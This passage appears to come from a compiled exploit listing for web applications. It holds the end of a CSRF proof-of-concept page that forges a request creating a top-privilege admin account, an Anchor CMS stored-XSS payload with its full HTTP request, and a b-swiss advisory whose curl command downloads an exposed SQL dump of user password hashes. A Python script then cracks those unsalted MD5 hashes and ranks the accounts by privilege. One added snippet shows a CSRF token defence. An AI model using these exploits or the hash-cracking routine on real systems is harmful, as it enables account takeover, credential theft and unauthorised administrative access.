          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"inpopup\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rowid\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
          "\r\n" +
          "TestingusF\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
          "\r\n" +
          "TestingusL\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_email\"\r\n" +
          "\r\n" +
          "[email protected]\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_username\"\r\n" +
          "\r\n" +
          "testingus\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_password\"\r\n" +
          "\r\n" +
          "123456\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
          "\r\n" +
          "123456\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
          "\r\n" +
          "100000\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_status\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_language\"\r\n" +
          "\r\n" +
          "french-sw\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
          "\r\n" +
          "2\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Press me" onclick="GodMode();" />
    </form>
  </body>
</html>
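The PoC above works because index.php accepts the Users.Save write on the strength of the session cookie alone; the attacker's page never needs to read anything from the application. As an added example, not code from the advisory or from b-swiss, the Python below models that unchecked handler next to a hardened one that requires a session-bound synchronizer token and an Origin (or Referer) matching the site, and runs the PoC's forged request against both. The request model, the function names and the session identifier are assumptions; only the form field names and the 192.168.10.11 origin come from the PoC.

```python
"""CSRF protection for a state-changing endpoint such as index.php, locator=Users.Save.

Added illustration, not b-swiss code. The request model (a dict carrying the
session cookie, headers and form fields) and all function names are
hypothetical; only the form field names and the target origin come from the
advisory's PoC.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

SITE_ORIGIN = "http://192.168.10.11"     # where the application is served from (PoC target)
SERVER_SECRET = secrets.token_bytes(32)  # per-deployment secret; rotating it invalidates all tokens


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session id).
    The app embeds it in its own forms; an attacker's page cannot read it
    because the same-origin policy stops it reading this site's HTML."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Browsers set Origin on cross-site POSTs and page script cannot override it;
    fall back to the Referer's scheme://host[:port] when Origin is absent."""
    if headers.get("Origin"):
        return headers["Origin"]
    parts = headers.get("Referer", "").split("/")
    return parts[0] + "//" + parts[2] if len(parts) >= 3 and parts[0] else None


def users_save_no_csrf_check(request: Dict) -> str:
    """The pattern the PoC abuses: a valid session cookie alone authorises the write."""
    if request.get("cookie_session") is None:
        return "401 not logged in"
    form = request["form"]
    if form.get("locator") != "Users.Save":
        return "400 unexpected locator"
    return f"200 created user {form['rec_username']} with adminlevel {form['rec_adminlevel']}"


def users_save_with_csrf_check(request: Dict) -> str:
    """Same write, refused unless both the origin and the token check out."""
    session_id = request.get("cookie_session")
    if session_id is None:
        return "401 not logged in"
    if request_origin(request.get("headers", {})) != SITE_ORIGIN:
        return "403 cross-site origin"        # no Origin and no Referer is rejected as well
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return "403 missing or invalid csrf token"
    return users_save_no_csrf_check(request)


# Constructed request: what the PoC's XMLHttpRequest produces when a logged-in
# admin clicks "Press me" on the attacker's page. withCredentials=true attaches
# the cookie; the browser, not the script, sets Origin to the attacker's page.
FORGED_REQUEST = {
    "cookie_session": "admin-session-0001",
    "headers": {"Origin": "http://attacker.example"},
    "form": {"locator": "Users.Save", "rec_username": "testingus",
             "rec_password": "123456", "rec_adminlevel": "100000"},
}


def legitimate_request(session_id: str = "admin-session-0001") -> Dict:
    """The same form submitted from the application's own admin page, token included."""
    return {
        "cookie_session": session_id,
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"locator": "Users.Save", "rec_username": "newadmin",
                 "rec_password": "correct horse", "rec_adminlevel": "100000",
                 "csrf_token": issue_csrf_token(session_id)},
    }


if __name__ == "__main__":
    print("unchecked, forged :", users_save_no_csrf_check(FORGED_REQUEST))
    print("hardened,  forged :", users_save_with_csrf_check(FORGED_REQUEST))
    print("hardened,  legit  :", users_save_with_csrf_check(legitimate_request()))
```

The token is the primary control and the origin check is defence in depth: Origin is set by the browser and cannot be forged from script, but some clients and proxies strip it, so a deployment that relied on it alone would either lock out those clients or have to fail open. Marking the session cookie SameSite=Lax or Strict adds a third layer, since a cross-site POST then no longer carries the cookie at all.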
  24. # Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/admin/
2- Log in to the admin panel.
3- Press the "Posts" button.
4- Write the XSS payload into the description of the post.
5- Press the "Save" button.
6- Go to the post.

XSS Payload ==> "><script>alert("XSS")</script>

==> HTTP Request <==

POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close

token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
  25. # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
# Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00

B-swiss 3 Digital Signage System 3.6.5 Database Disclosure


Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
                  3.6.2
                  3.6.1
                  3.6.0
                  3.5.80
                  3.5.40
                  3.5.20
                  3.5.00
                  3.2.00
                  3.1.00

Summary: Intelligent digital signage made easy. To go beyond the possibilities
offered, b-swiss allows you to create the communication solution for your
specific needs and your graphic charter. You benefit from our experience and
know-how in the realization of your digital signage project.

Desc: The application is vulnerable to an unauthenticated database download
and information disclosure vulnerability. This can enable the attacker to
disclose sensitive information resulting in authentication bypass, session
hijacking and full system control.
Tested on: Linux 5.3.0-46-generic x86_64
           Linux 4.15.0-20-generic x86_64
           Linux 4.9.78-xxxx-std-ipv6-64
           Linux 4.7.0-040700-generic x86_64
           Linux 4.2.0-27-generic x86_64
           Linux 3.19.0-47-generic x86_64
           Linux 2.6.32-5-amd64 x86_64
           Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
           macOS 10.13.5
           Microsoft Windows 7 Business Edition SP1 i586
           Apache/2.4.29 (Ubuntu)
           Apache/2.4.18 (Ubuntu)
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Win64)
           Apache/2.4.18 (Ubuntu)
           Apache/2.2.16 (Debian)
           PHP/7.2.24-0ubuntu0.18.04.6
           PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
           PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
           PHP/5.6.31
           PHP/5.6.30-10+deb.sury.org~xenial+2
           PHP/5.5.9-1ubuntu4.17
           PHP/5.5.9-1ubuntu4.14
           PHP/5.3.10
           PHP/5.3.13
           PHP/5.3.3-7+squeeze16
           PHP/5.3.3-7+squeeze17
           MySQL/5.5.49
           MySQL/5.5.47
           MySQL/5.5.40
           MySQL/5.5.30
           MySQL/5.1.66
           MySQL/5.1.49
           MySQL/5.0.77
           MySQL/5.0.12-dev
           MySQL/5.0.11-dev
           MySQL/5.0.8-dev
           phpMyAdmin/3.5.7
           phpMyAdmin/3.4.10.1deb1
           phpMyAdmin/3.4.7
           phpMyAdmin/3.3.7deb7
           WampServer 3.2.0
           Acore Framework 2.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5588
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php


13.06.2020

--


$ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4
INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
(1, 0, 0, 'Dusko', 'Dolgousko', '[email protected]', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
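The dump fragment above is what turns a file disclosure into the authentication bypass the description mentions: the password column holds 32 hex characters and there is no salt column, so every value is a candidate for a plain MD5 dictionary check. As an added example, not code from the advisory or from b-swiss, the Python below parses the users rows out of the SQL text, tests each hash against a small constructed wordlist, and reports hashes shared between accounts, which can only happen without a per-user salt. The wordlist, the parser and the function names are assumptions; the dump text is the fragment shown in the curl output.

```python
"""Triage of the users table from an exposed b-swiss dump.

Added example, not b-swiss or advisory code. DUMP is the fragment the curl
output above shows; the wordlist, the column handling and the function names
are assumptions.
"""
import hashlib
import re
from typing import Dict, List, Optional

DUMP = """
INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
(1, 0, 0, 'Dusko', 'Dolgousko', '[email protected]', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
"""

# Constructed and deliberately tiny; a real check would use a proper wordlist.
WORDLIST = ["admin", "user", "1234", "password", "123456"]

# One SQL literal: a single-quoted string (backslash escapes allowed) or an integer.
_VALUE = re.compile(r"'((?:[^'\\]|\\.)*)'|(-?\d+)")


def parse_users(dump: str) -> List[Dict]:
    """Return one dict per row of the `users` INSERT, keyed by column name."""
    m = re.search(r"INSERT INTO `users` \((.*?)\) VALUES\s*(.*?);", dump, re.S)
    if m is None:
        raise ValueError("no users INSERT found in dump")
    columns = [c.strip().strip("`") for c in m.group(1).split(",")]
    rows = []
    for raw in re.findall(r"\(([^()]*)\)", m.group(2)):   # the literals never contain parentheses
        values = [mt.group(1) if mt.group(1) is not None else int(mt.group(2))
                  for mt in _VALUE.finditer(raw)]
        if len(values) != len(columns):
            raise ValueError(f"row has {len(values)} values, expected {len(columns)}")
        rows.append(dict(zip(columns, values)))
    return rows


def looks_like_unsalted_md5(h: str) -> bool:
    """32 lowercase hex digits and no salt column: the shape of a bare MD5."""
    return re.fullmatch(r"[0-9a-f]{32}", h) is not None


def crack_md5(hexdigest: str, wordlist: List[str] = WORDLIST) -> Optional[str]:
    """Dictionary check against an unsalted MD5; returns the matching word or None."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == hexdigest:
            return candidate
    return None


def shared_hashes(users: List[Dict]) -> Dict[str, List[str]]:
    """Identical hashes across accounts mean identical passwords and no per-user salt."""
    seen: Dict[str, List[str]] = {}
    for u in users:
        seen.setdefault(u["password"], []).append(u["username"])
    return {h: names for h, names in seen.items() if len(names) > 1}


def triage(dump: str, wordlist: List[str] = WORDLIST) -> Dict[str, Dict]:
    """Per username: privilege level, active flag, hash shape and a crack attempt."""
    report = {}
    for u in parse_users(dump):
        h = u["password"]
        unsalted = looks_like_unsalted_md5(h)
        report[u["username"]] = {
            "adminlevel": u["adminlevel"],
            "active": u["status"] == 1,
            "unsalted_md5": unsalted,
            "cracked": crack_md5(h, wordlist) if unsalted else None,
        }
    return report


if __name__ == "__main__":
    users = parse_users(DUMP)
    for name, info in triage(DUMP).items():
        print(f"{name:10} adminlevel={info['adminlevel']:<7} cracked={info['cracked']}")
    print("accounts sharing a hash:", shared_hashes(users))
```

Run as is, it recovers the passwords of the admin, User and test accounts from a five-word list and flags that admin_m (adminlevel 100000) and b-swiss share one hash; the other adminlevel values carry across to the users table untouched, so the report also shows which of the recovered logins matter most.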